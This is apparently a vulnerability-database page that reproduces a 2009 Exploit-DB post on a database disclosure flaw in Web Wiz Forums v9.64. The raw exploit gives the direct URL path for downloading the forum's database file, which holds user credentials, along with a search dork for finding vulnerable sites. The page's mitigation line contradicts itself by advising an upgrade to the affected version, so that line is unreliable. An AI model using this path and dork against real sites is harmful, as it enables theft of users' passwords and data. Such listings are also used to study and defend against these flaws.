Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability

vendor:

Web Wiz Forums

by:

ViRuSMaN

8.8

CVSS

HIGH

Remote Database Disclosure

200

CWE

Product Name: Web Wiz Forums

Affected Version From: 9.64

Affected Version To: 9.64

Patch Exists: YES

Related CWE: N/A

CPE: a:webwizguide:web_wiz_forums

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability

Web Wiz Forums v9.64 is vulnerable to a remote database disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to access the database file, which contains sensitive information such as usernames, passwords, and other confidential data.

Mitigation:

Upgrade to the latest version of Web Wiz Forums v9.64 or later.

Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
==============================================================================
        [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ Web Wiz Forums v9.64 ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
    [»] Download:           [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
    [»] Dork:               [ Web Wiz Forums® version 9.64 [Free Express Edition] ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/database/wwForum.mdb

Author: ViRuSMaN <-

###########################################################################